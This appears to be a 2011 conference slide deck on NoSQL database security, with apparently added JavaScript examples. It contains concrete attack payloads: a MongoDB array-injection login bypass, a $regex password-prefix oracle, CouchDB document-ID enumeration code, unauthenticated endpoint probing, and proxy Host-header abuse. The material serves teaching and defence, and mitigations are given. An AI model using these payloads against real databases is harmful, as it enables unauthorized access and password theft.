Rooted 2011 nosql security
1. NoSQL Security
José Ramón Palanco
Wednesday, March 16, 2011
2. Agenda
✦ NoSQL Introduction
✦ NoSQL vs RDBMS
✦ NoSQL Architecture
✦ NoSQL Implementations
✦ Attack vectors
✦ Injections
✦ Key Bruteforce
✦ HTTP Protocol Based Attacks in listeners
✦ Cassandra security and Thrift security
✦ Denial of Service (connection pollution, evil queries)
3. NoSQL Introduction
4. What is NoSQL?
✦ In general, no table schema is needed and joins are not used
✦ NoSQL solutions relax one or more of the ACID properties
5. CAP Theorem
✦ Properties: consistency, availability and partition tolerance
✦ A distributed system can guarantee at most two of the three at once
✦ Scaling out means tolerating partitions, so the real trade-off is between consistency and availability
✦ In general, availability is preferred over consistency
6. NoSQL Architecture
RDBMS                    NoSQL
Client                   Client
HTTP Server              HTTP Server
SQL                      REST, JSON, XML, ...
DB Connector             DB Connector
ODBC, ADO, JDBC          Binary, HTTP, ...
7. NoSQL vs RDBMS
✦ RDBMS show poor performance and scalability in applications that make heavy use of data
✦ Cloud Computing (SaaS)
✦ Social Networks (SN)
✦ Complex queries, however, are still only practical in an RDBMS
8. Environments
✦ In many environments writes have to be distributed across clusters, MapReduce, ...
✦ Facebook has to store 135 billion messages each month
✦ Twitter stores 7 TB per day
9. NoSQL disadvantages
✦ OLTP
✦ SQL
✦ Ad-hoc queries
✦ Complex relations
10. NoSQL Architectures
✦ Document store
✦ Graph
✦ Key-value store
✦ Multivalue
✦ Objects
✦ Tabular
11. Document store
✦ CouchDB
✦ MongoDB
✦ Terrastore
✦ ThruDB
✦ OrientDB
✦ RavenDB
12. Graph
✦ Neo4J
✦ Sones
✦ InfoGrid
✦ HypergraphDB
✦ AllegroGraph
✦ BigData
13. Key-value
✦ Redis
✦ Riak
✦ Tokyo Cabinet
✦ MemcacheDB
✦ Membase
✦ Azure
14. Multivalue
✦ U2
✦ OpenInsight
✦ OpenQM
15. Objects
✦ db4o
✦ Objectivity
✦ Versant
✦ NEO
16. MongoDB
✦ Protocol: Binary (BSON)
✦ API: several languages
✦ Query: JavaScript/JSON
✦ Language: C++
17. CouchDB
✦ Protocol: REST (RESTful HTTP API)
✦ API: JSON
✦ Query: MapReduce (JS)
✦ Language: Erlang
Features
• Schema-Free (JSON)
• Document Oriented, Not Relational
• Highly Concurrent
• JavaScript-Powered Map/Reduce
• N-Master Replication
• Robust Storage
18. {"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/ HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Date: Sat, 19 Feb 2011 05:20:28 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 188
Cache-Control: must-revalidate

{"db_name":"rooted","doc_count":1,"doc_del_count":0,"update_seq":1,"purge_seq":0,"compact_running":false,"disk_size":4182,"instance_start_time":"1298092462502662","disk_format_version":5}
19. {"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/f34aae022f67a23ac56dba5b4e000cf2 HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Etag: "1-2512702fff02fe841adecde4a22c62b5"
Date: Sat, 19 Feb 2011 05:20:47 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 155
Cache-Control: must-revalidate

{"_id":"f34aae022f67a23ac56dba5b4e000cf2","_rev":"1-2512702fff02fe841adecde4a22c62b5","Nombre":"Jose","DNI":"9393948K","telefono":999999999}
Connection closed by foreign host.
20. Redis
✦ Protocol: plain text (usable straight from telnet)
✦ API: several languages
✦ Query: commands
✦ Language: C
21. Cassandra
✦ Protocol: Binary (Thrift)
✦ API: Thrift
✦ Query: Column/ranges
✦ Languages: Java
22. Cassandra
✦ Column (tuple/triplet: name, value, timestamp)
✦ Supercolumn (composed of columns)
✦ Column Family (contains columns, or supercolumns when ColumnType="Super")
✦ Keyspace (stores column families)
23. Cassandra: storage-conf.xml
<Keyspace Name="BloggyAppy">
<!-- CF definitions -->
<ColumnFamily CompareWith="BytesType" Name="Authors"/>
<ColumnFamily CompareWith="BytesType" Name="BlogEntries"/>
<ColumnFamily CompareWith="TimeUUIDType" Name="TaggedPosts"/>
<ColumnFamily CompareWith="TimeUUIDType" Name="Comments"
CompareSubcolumnsWith="BytesType" ColumnType="Super"/>
</Keyspace>
25. Introduction
✦ Several database concepts
✦ Several implementations
✦ So the attack vectors are very specific and depend on each implementation
26. HTTP Based Attacks
✦ Who uses HTTP?
✦ CouchDB
✦ HBase
✦ Riak
✦ How to locate vulnerabilities?
✦ fuzzing: hzzp
27. Listener exploitation
✦ As they work over HTTP, misconfigured cache proxies can be used to reach them: the request goes to the public proxy on port 80 while the Host header names the internal database listener

$ telnet server.com 80
Trying X.X.X.X...
Connected to server.com.
Escape character is '^]'
GET /_all_dbs
Host: 192.168.2.18
28. JSON Injection
In the same way that SQL input is escaped, input that ends up in CouchDB or MongoDB queries must be escaped or validated too. Intended query:
db.foo.find( { $or : [ { a : 1 } , { b : 2 } ] } )
After injecting an extra clause that matches any document with a string field c:
db.foo.find( { $or : [ { a : 1 } , { b : 2 }, { c : /.*/ } ] } )
29. Array Injection
MongoDB + PHP
<?php
$collection->find(array(
    "username" => $_GET['username'],
    "passwd"   => $_GET['passwd']
));
?>
✦ In PHP a request parameter becomes an array simply by adding brackets to its name
✦ If the admin's passwd is 'not equal' to anything we choose, we can log in:
/login.php?username=admin&passwd[$ne]=1
✦ PHP then hands MongoDB this query (single quotes around $ne: in double quotes PHP would interpolate it as a variable):
<?php
$collection->find(array(
    "username" => "admin",
    "passwd"   => array('$ne' => 1)
));
?>
✦ Besides $ne we can inject $or, $exists, $nin, $in, $lt, ... (logical and comparison operators)
✦ &var[$regex]=/privileged/i (regex)
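The array injection on this slide and the JSON injection on slide 28 share one root cause: a value the application meant as a plain string reaches the database as an operator object. The following JavaScript is an added example, not code from the talk. It mimics PHP's bracket parsing of $_GET and a small subset of MongoDB's query matcher (both are stand-ins written for this example, not the real libraries), runs them over a constructed user collection, and puts the vulnerable login filter next to a hardened one that refuses non-string credentials. It also goes one step beyond the slide by showing how $regex turns the same bug into a password prefix oracle.

```javascript
// Added example: PHP array injection into a MongoDB login filter.
// parsePhpQuery() stands in for PHP's $_GET bracket parsing and
// matches() for a small slice of MongoDB's query matcher; both are
// written for this illustration, not taken from PHP or MongoDB.

// "passwd[$ne]=1" becomes { passwd: { '$ne': '1' } }. PHP delivers
// strings, so the value is the string "1", which $ne still rejects.
function parsePhpQuery(qs) {
  const params = {};
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const value = decodeURIComponent(eq < 0 ? '' : pair.slice(eq + 1));
    const m = /^([^[]+)\[([^\]]*)\]$/.exec(rawKey);
    if (m) {
      params[m[1]] = params[m[1]] || {};
      params[m[1]][m[2]] = value;
    } else {
      params[rawKey] = value;
    }
  }
  return params;
}

// Minimal matcher: a nested object is read as an operator expression,
// which is exactly the behaviour the injected bracket parameter exploits.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    const v = doc[field];
    if (cond === null || typeof cond !== 'object') return v === cond;
    return Object.entries(cond).every(([op, arg]) => {
      switch (op) {
        case '$ne':    return v !== arg;
        case '$in':    return [].concat(arg).includes(v);
        case '$nin':   return ![].concat(arg).includes(v);
        case '$gt':    return v > arg;
        case '$lt':    return v < arg;
        case '$regex': return typeof v === 'string' && new RegExp(arg).test(v);
        default: throw new Error('operator not modelled: ' + op);
      }
    });
  });
}

// Constructed sample collection (not real data).
const users = [
  { username: 'admin', passwd: 's3cret!' },
  { username: 'jose',  passwd: 'hunter2' },
];

// Vulnerable: mirrors $collection->find(array("username" => $_GET[...], ...)).
// Whatever shape PHP parsed goes straight into the filter.
function vulnerableLogin(qs) {
  const p = parsePhpQuery(qs);
  return users.filter(u => matches(u, { username: p.username, passwd: p.passwd }))
              .map(u => u.username);
}

// Hardened: credentials must be plain strings. A bracket parameter
// arrives as an object and is refused before it can carry an operator.
// (Stripping '$'-prefixed keys is a useful second layer for JSON bodies,
// but the type check is the control that closes this bug.)
function safeLogin(qs) {
  const p = parsePhpQuery(qs);
  if (typeof p.username !== 'string' || typeof p.passwd !== 'string') {
    throw new TypeError('credentials must be plain strings');
  }
  return users.filter(u => matches(u, { username: p.username, passwd: p.passwd }))
              .map(u => u.username);
}

// Walk through the slide's payload, a $regex prefix oracle, and the fix.
function demo() {
  const out = {
    ne:    vulnerableLogin('username=admin&passwd[$ne]=1'),      // ['admin']
    regex: vulnerableLogin('username=admin&passwd[$regex]=^s3'), // ['admin']: prefix "s3" confirmed
    wrong: vulnerableLogin('username=admin&passwd=wrong'),       // []
  };
  try { safeLogin('username=admin&passwd[$ne]=1'); out.safe = 'accepted'; }
  catch (e) { out.safe = e.constructor.name; }                   // 'TypeError'
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo()));
}
```

The $regex case is why this is worse than a single login bypass: one request per candidate prefix lets an attacker read the stored password character by character, so a server that stores passwords in clear text (as the slide's example does) leaks them outright. Checking `typeof === 'string'` before building the filter is cheap and closes every operator variant at once.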
30. View Injection
✦ CouchDB uses SpiderMonkey as scripting engine
✦ Views are loaded as JavaScript and executed by couchjs
$ ldd /usr/lib/couchdb/bin/couchjs
libcurl.so.4 => /usr/lib/libcurl.so.4 (0x00007f7124325000)
libmozjs.so.2d => /usr/lib/libmozjs.so.2d (0x00007f7124063000)
...
31. View Injection
✦ There are predefined (design document) views and temporary views
✦ Both are used to run MapReduce
✦ If user input reaches the view's JavaScript, an attacker can read arbitrary data or change values to alter the execution flow
33. CouchDB info
✦ http://172.16.163.129:5984/_config
✦ http://172.16.163.129:5984/_all_dbs
✦ http://172.16.163.129:5984/_stats
✦ http://172.16.163.129:5984/_utils
✦ In the default "admin party" configuration of this CouchDB version no admin user is defined, so all of these answer unauthenticated; _config in particular exposes the server settings
35. GQL Injection
✦ GQL injection is reachable, but in a very controlled environment
✦ There is no negation operator "!"
✦ The set of GQL commands is very limited
36. Key Bruteforce
✦ As there are no schemas, we do not have to discover them
✦ The IDs are long, but not generated at random: these two share the first 26 hex characters and differ only in the last 6
e479f720ff9a05fb2f441fef97000c87
e479f720ff9a05fb2f441fef97000b61
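What the shared prefix buys an attacker, as an added example (not code from the talk): with two IDs of the form shown above, a fixed 26-hex prefix and a 6-hex suffix that only moves forward, the IDs between them can simply be enumerated. The JavaScript below assumes the generator keeps the prefix while the suffix advances, which is what the two IDs on the slide show; the IDs are the slide's and no server is contacted.

```javascript
// Added example: enumerating CouchDB document IDs that follow the
// pattern on the slide (fixed 26-hex prefix, growing 6-hex suffix).
// Assumption: one prefix = one sequence, as the two observed IDs suggest.
const ID_LEN = 32;
const SUFFIX_LEN = 6;

function splitId(id) {
  if (!new RegExp('^[0-9a-f]{' + ID_LEN + '}$').test(id)) {
    throw new Error('not a 32-hex CouchDB id: ' + id);
  }
  return {
    prefix: id.slice(0, ID_LEN - SUFFIX_LEN),
    suffix: parseInt(id.slice(ID_LEN - SUFFIX_LEN), 16),
  };
}

// All IDs that can lie between two observed ones (inclusive), lowest
// first. Refuses IDs from different prefix sequences, where a shared
// counter cannot be assumed.
function candidateIds(idA, idB) {
  const a = splitId(idA), b = splitId(idB);
  if (a.prefix !== b.prefix) {
    throw new Error('prefixes differ: the IDs are not from one sequence');
  }
  const lo = Math.min(a.suffix, b.suffix), hi = Math.max(a.suffix, b.suffix);
  const ids = [];
  for (let n = lo; n <= hi; n++) {
    ids.push(a.prefix + n.toString(16).padStart(SUFFIX_LEN, '0'));
  }
  return ids;
}

// The two IDs from the slide.
const observed = [
  'e479f720ff9a05fb2f441fef97000c87',
  'e479f720ff9a05fb2f441fef97000b61',
];

if (typeof require !== 'undefined' && require.main === module) {
  const ids = candidateIds(observed[0], observed[1]);
  console.log(ids.length + ' candidate IDs between the two observed ones'); // 295
  console.log(ids[0] + ' ... ' + ids[ids.length - 1]);
}
```

Each candidate becomes a GET /rooted/{id}; a 200 against a 404 tells the attacker which documents exist, and the telnet session on slide 19 shows the document body comes back with no authentication. The whole suffix space for one prefix is only 16^6 (about 16.7 million) requests, against 2^128 for a random ID. The countermeasures are to use the random UUID algorithm (CouchDB's [uuids] algorithm setting, or client-generated UUIDv4) and, above all, not to treat an unguessable ID as access control.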
37. Cassandra Security
✦ If we change the name of a column family, we can get items from another family
✦ The "_myfam" suffix does not help: any column family whose name ends in _myfam is reachable, so the CF parameter must be checked against an allowlist of expected names
✦ The Thrift listener itself performs no authentication in the default configuration (AllowAllAuthenticator), so the application is the only control
<?php
...
$columnParent = new cassandra_ColumnParent();
$columnParent->super_column = NULL;
if (isset($_GET['CF']))
    $columnParent->column_family = $_GET['CF'] . "_myfam";   // attacker picks the column family
$sliceRange = new cassandra_SliceRange();
$sliceRange->start = "";
$sliceRange->finish = "";
$predicate = new cassandra_SlicePredicate();
$predicate->column_names = NULL;                            // no explicit column list: use the slice range
$predicate->slice_range = $sliceRange;
$consistency_level = cassandra_ConsistencyLevel::ONE;
$keyUserId = 1;
$result = $client->get_slice($keyspace, $keyUserId,
    $columnParent, $predicate, $consistency_level);
print_r($result);
...
?>
38. Denial of Service
✦ Connection pollution
✦ CouchDB: the interface implementation is RESTful, so every operation is an HTTP request to the listener
✦ With GQL it is possible to cause a DoS by crafting queries that make intensive use of CPU; the application is then disconnected, or billed for the extra CPU